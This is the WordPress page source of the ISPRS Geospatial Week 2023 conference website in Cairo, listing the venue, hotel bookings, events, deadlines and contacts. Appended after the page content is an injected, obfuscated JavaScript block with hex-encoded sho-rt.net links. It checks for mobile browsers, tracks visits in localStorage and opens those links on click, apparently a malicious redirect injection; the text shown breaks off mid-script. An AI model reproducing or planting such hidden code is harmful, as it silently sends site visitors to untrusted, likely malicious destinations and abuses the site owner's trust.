center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 